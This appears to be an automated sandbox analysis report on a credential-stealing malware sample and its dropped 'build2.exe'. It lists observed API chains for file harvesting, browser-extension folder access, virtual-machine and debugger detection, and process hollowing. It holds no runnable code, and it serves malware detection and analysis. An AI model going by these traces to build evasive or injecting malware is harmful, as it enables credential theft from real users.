                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_002EF730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_002EF730
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_002F0160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_002F0160
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_002EFB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,2_2_002EFB98
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00B9F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,3_2_00B9F730
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00BA0160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,3_2_00BA0160
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00B9FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,3_2_00B9FB98
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_00411A10 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,5_2_00411A10
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_0041C260 wsprintfA,FindFirstFileA,memset,lstrcat,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,lstrlenA,strtok_s,strtok_s,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,5_2_0041C260
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_0040F200 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,5_2_0040F200
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_0041D400 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,5_2_0041D400
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_00401600 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,5_2_00401600
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_0040F8B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,5_2_0040F8B0
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_0041CBA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,5_2_0041CBA0
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_0040EDB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,5_2_0040EDB0
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_0041CFF0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,5_2_0041CFF0
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_0041C6B0 strtok_s,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,strtok_s,5_2_0041C6B0
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_00416390 GetSystemInfo,wsprintfA,5_2_00416390
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeThread delayed: delay time: 700000Jump to behavior
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1964059051.0000000003AD2000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1967093428.0000000003AD0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 10/03/2023 13:09:52.535OFFICECL (0x2394)0x12d8Telemetry EventbiyhqMediumSendEvent {"EventName": "Office.System.SystemHealthMetadataDeviceConsolidated", "Flags": 33777031581908737, "InternalSequenceNumber": 11, "Time": "2023-10-03T12:09:52Z", "Rule": "120600.4", "AriaTenantToken": "cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521", "Contract": "Office.Legacy.Metadata", "Data.ProcTypeText": "x64", "Data.ProcessorCount": 2, "Data.NumProcShareSingleCore": 1, "Data.NumProcShareSingleCache": 1, "Data.NumProcPhysCores": 2, "Data.ProcSpeedMHz": 2000, "Data.IsLaptop": false, "Data.IsTablet": false, "Data.RamMB": 4096, "Data.PowerPlatformRole": 1, "Data.SysVolSizeMB": 50000, "Data.DeviceManufacturer": "VMWare, Inc.", "Data.DeviceModel": "VMware20,1", "Data.DigitizerInfo": 0, "Data.SusClientId": "097C77FB-5D5D-4868-860B-09F4E5B50A53", "Data.WindowsSqmMachineId": "92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A", "Data.ComputerSystemProductUuidHash": "rC2kkStHpWGLvfAgmQZRz4w5ixE=", "Data.DeviceProcessorModel": "Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz", "Data.HasSpectreFix": true, "Data.BootDiskType": "SSD"}
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1964059051.0000000003AD2000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMware20,1
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000000.00000002.1668297037.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000000.00000003.1662790576.0000000000E21000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000000.00000003.1658762924.0000000000E21000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000000.00000002.1668297037.0000000000E21000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000002.00000003.1680457736.0000000000A77000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000002.00000002.2903240410.0000000000A77000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2293082547.0000000000EF5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000000.00000002.1668297037.0000000000E02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: build2.exe, 00000005.00000002.2906708317.0000000000698000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000006.00000003.1840539958.00000000008C6000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000006.00000002.1842375819.00000000008C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000002.00000002.2903240410.00000000009DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                Source: build2.exe, 00000005.00000003.1761763513.0000000000702000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2906708317.0000000000702000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWD-j;
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000002.00000003.1680457736.0000000000A77000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000002.00000002.2903240410.0000000000A77000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWSy
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2293082547.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2276086910.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2310805053.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2006792138.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2315470556.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2283667916.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2295385362.0000000000EF5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW$
                Source: build2.exe, 00000005.00000002.2906708317.0000000000698000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareJ
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeAPI call chain: ExitProcess graph end nodegraph_0-38468
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeAPI call chain: ExitProcess graph end node
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeAPI call chain: ExitProcess graph end node
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeProcess information queried: ProcessInformation
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00B91193 rdtsc 0_2_00B91193
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00BB4168 _memset,IsDebuggerPresent,0_2_00BB4168
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00BBA57A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00BBA57A
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_00361920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,2_2_00361920
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00BA2220 GetCommandLineW,CommandLineToArgvW,PathFindFileNameW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,K32EnumProcesses,OpenProcess,K32EnumProcessModules,K32GetModuleBaseNameW,CloseHandle,0_2_00BA2220
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_005B0042 push dword ptr fs:[00000030h]4_2_005B0042
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_005CF270 mov eax, dword ptr fs:[00000030h]4_2_005CF270
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_005B1D50 mov eax, dword ptr fs:[00000030h]4_2_005B1D50
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_005B1D60 mov eax, dword ptr fs:[00000030h]4_2_005B1D60
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_005B1D30 mov eax, dword ptr fs:[00000030h]4_2_005B1D30
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_00633CD3 push dword ptr fs:[00000030h]4_2_00633CD3
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_004013C0 mov eax, dword ptr fs:[00000030h]5_2_004013C0
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_00401390 mov eax, dword ptr fs:[00000030h]5_2_00401390
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_004013B0 mov eax, dword ptr fs:[00000030h]5_2_004013B0
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_0041E8D0 mov eax, dword ptr fs:[00000030h]5_2_0041E8D0
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00BB78D5 GetProcessHeap,0_2_00BB78D5
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00BC29BB SetUnhandledExceptionFilter,0_2_00BC29BB
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00BC29EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00BC29EC
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_003129BB SetUnhandledExceptionFilter,2_2_003129BB
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_003129EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_003129EC
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00BC29BB SetUnhandledExceptionFilter,3_2_00BC29BB
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00BC29EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00BC29EC
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_004019E0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_004019E0
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_00404A2D SetUnhandledExceptionFilter,4_2_00404A2D
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_0040FBF5 __NMSG_WRITE,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0040FBF5
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_00402D04 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00402D04
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_0042B35A SetUnhandledExceptionFilter,5_2_0042B35A
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_0042064E memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_0042064E
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_00426C10 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00426C10
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61EAF900 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,5_2_61EAF900
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61EAF8FC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,5_2_61EAF8FC

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_005B0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,4_2_005B0110
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeMemory written: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_00417C00 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,5_2_00417C00
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeProcess created: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe "C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe" --Admin IsNotAutoStart IsNotTask
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeProcess created: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe "C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe"
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeProcess created: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe "C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe"
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00B91000 cpuid 0_2_00B91000
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_00BD0116
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,0_2_00BC8178
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00BC82A2
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: GetLocaleInfoW,_GetPrimaryLen,0_2_00BC834F
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,0_2_00BC8423
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: EnumSystemLocalesW,0_2_00BC87C8
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: GetLocaleInfoW,0_2_00BC884E
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,0_2_00BC7BB3
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,0_2_00BC7E83
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: EnumSystemLocalesW,0_2_00BC7E27
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,0_2_00BC7F83
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,0_2_00BC7F00
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,2_2_00320116
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,2_2_00318178
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_003182A2
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: GetLocaleInfoW,_GetPrimaryLen,2_2_0031834F
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,2_2_00318423
